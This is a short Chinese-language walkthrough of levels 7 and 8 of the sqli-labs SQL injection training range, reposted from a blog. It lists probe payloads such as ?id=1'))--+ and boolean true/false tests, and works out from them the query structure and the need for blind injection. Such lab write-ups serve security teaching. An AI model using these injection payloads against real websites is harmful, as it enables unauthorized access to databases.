SQL注入sqli_labs靶场第七、八题
第七题
根据报错信息
?id=1' and '1'='1 返回页面正常 ------对应查询SQL:where id=(('1' and '1'='1'));
?id=1' and '1'='2 返回页面报错 ------对应查询SQL:where id=(('1' and '1'='2'));
判断为字符型注入
?id=1" 返回页面正常 ---------对应查询SQL:where id=(('1"'))
?id=1'--+ 返回页面报错 ---------对应查询SQL:where id=(('1'--+')) -----破坏SQL语句原有结构
?id=1')--+ 返回页面报错 --------对应查询SQL:where id=(('1')--+'))
?id=1'))--+ 返回页面正常 --------对应查询SQL:where id=(('1'))--+'))
注入形式为:?id=1'))
没有回显点,尝试盲注,与第五题方法相同
第八题
?id=1 and 1=1 页面正常
?id=1 and 1=2 页面正常
?id=1' and '1'='1 页面正常
?id=1' and '1'='2 页面不正常,无回显信息
判断为字符型注入
?id=1'--+ 页面正常,无回显信息 -------------------SQL查询语句:where id='1'--+'
注入形式为?id=1''
没有回显点,尝试盲注,与第五题方法相同
原文地址:https://blog.csdn.net/2301_79355407/article/details/137650397
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!